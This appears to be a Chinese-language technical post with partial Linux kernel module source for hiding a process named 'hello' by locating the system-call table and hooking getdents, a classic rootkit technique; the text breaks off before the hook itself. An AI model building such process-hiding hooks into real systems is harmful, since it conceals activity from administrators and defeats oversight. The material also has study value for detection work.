Linux隐藏进程

在不修改内核源码的情况下,通过劫持系统调用和Linux可卸载模块编程,实现隐藏进程的技术。示例程序包含在makefile中,用于编译和清理。参考了多个关于Linux高级隐藏技术和系统调用劫持的文章。

系统信息:内核为 2.6.32,CentOS x86_64

由于不能修改内核源码,故需要引入劫持系统调用技术、Linux可卸载模块编程技术

示例程序

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/sched.h>
#include <asm/unistd.h>
#include <linux/dirent.h>
#include <linux/stat.h>
#include <linux/fs.h>
#include <linux/proc_fs.h>
#define CALLOFF 100

//define idtr and idt struct
//隐藏进程名为:hello

/* Name of the process this module is meant to hide from directory listings.
 * psname is a fixed 10-byte buffer (9 characters plus the terminator);
 * processname is the pointer the hook presumably matches entries against —
 * confirm against the (not shown) replacement getdents. */
char psname[10] = "hello";
char *processname = &psname[0];

/* Packed 6-byte image of the interrupt descriptor table register: a 16-bit
 * limit followed by a 32-bit base.  Packed so there is no padding between the
 * two fields; the commented-out helper below stores into it with `sidt`. */
struct {
    unsigned short limit;   /* table limit */
    unsigned int   base;    /* table base address */
} __attribute__((packed)) idtr;

/* Pointer to an 8-byte packed gate descriptor: the handler offset is split
 * into two 16-bit halves around the selector and the two attribute bytes.
 * NULL until something points it at a table; the commented-out
 * get_system_call() below is the only code in this excerpt that does. */
struct {
    unsigned short off_low;   /* handler offset, bits 0-15 */
    unsigned short sel;       /* code segment selector */
    unsigned char  none;      /* reserved byte */
    unsigned char  flags;     /* gate type / attribute bits */
    unsigned short off_high;  /* handler offset, bits 16-31 */
} __attribute__((packed)) *idt;

/* Same 8-byte gate layout as the anonymous struct above, under a named tag
 * so the commented-out getscTable() can cast to it.  The tag `_idt` starts
 * with an underscore and is therefore in the implementation's reserved
 * namespace at file scope; it is kept here because other code refers to it.
 * Natural alignment already yields 8 bytes, so no packing attribute is used. */
struct _idt
{
    unsigned short offset_low;   /* handler offset, bits 0-15 */
    unsigned short segment_sel;  /* code segment selector */
    unsigned char  reserved;
    unsigned char  flags;
    unsigned short offset_high;  /* handler offset, bits 16-31 */
};

/*unsigned long *getscTable()
{
    unsigned char idtr[6] = {0}, *shell = NULL, *sort = NULL;
    struct _idt *idtLong = NULL;
    unsigned long system_call = 0, sct = 0;
    unsigned short offset_low = 0, offset_high = 0;
    char *p = NULL;
    int i = 0;

    __asm__("sidt %0" : "=m" (idtr));

    idtLong=(struct _idt*)(*(unsigned long*)&idtr[2]+8*0x80);
    offset_low = idtLong->offset_low;
    offset_high = idtLong->offset_high;
    system_call = (offset_high<<16)|offset_low;

    shell=(char *)system_call;
    sort="\xff\x14\x85";

    for(i=0;i<(100-2);i++)
    {
        if(shell[i] == sort[0] && shell[i+1] == sort[1] && shell[i+2] == sort[2])
	{
	    break;
	}
    }

    p = &shell[i];
    p += 3;

    sct=*(unsigned long*)p;
    return (unsigned long*)(sct);
}*/

//define function, Point to the system being hijacked

/* Local copy of the directory record layout returned by getdents(): inode,
 * offset of the next record, total record length, then the NUL-terminated
 * name.  `d_name[1]` is the pre-C99 idiom for trailing variable-length data;
 * the real name extends past the declared element and d_reclen is the only
 * thing that says how far.  Any walk over a buffer of these must therefore
 * validate each d_reclen against the bytes remaining before trusting it.
 * NOTE(review): presumably mirrors the kernel's private definition in
 * fs/readdir.c for this kernel version — confirm. */
struct linux_dirent
{
    unsigned long  d_ino;      /* inode number */
    unsigned long  d_off;      /* offset to the next record */
    unsigned short d_reclen;   /* length of this whole record, name included */
    char           d_name[1];  /* start of the NUL-terminated name */
};

/* Address of the kernel's system-call dispatch table, resolved at runtime
 * (the lookup helper is cut off at the end of this excerpt).  Overwriting an
 * entry in this table is the classic rootkit hook; integrity monitors that
 * diff the table against System.map, and kernels that keep the table
 * read-only, are what detect it. */
unsigned long *sys_call_table = NULL;

/* Saved original getdents() entry point, so the replacement can forward to
 * the real implementation and — presumably — so it can be put back on module
 * unload.  NULL until the install code (not shown) fills it in.  An earlier
 * revision also kept a saved CR0 value alongside it. */
asmlinkage long (*orig_getdents)(unsigned int fd,
                                 struct linux_dirent __user *dirp,
                                 unsigned int count);

//get function system_call addr

/*void* get_system_call(void)
{
    printk(KERN_ALERT "start get_system_call...\n");
    void * addr = NULL;
    asm("sidt %0":"=m"(idtr));
    idt = (void*) ((unsigned long*)idtr.base);
    addr = (void*) (((unsigned int)idt[0x80].off_low) | (((unsigned int)idt[0x80].off_high)<<16 ));
    return addr;
}*/

//find sys_call_table

char* fin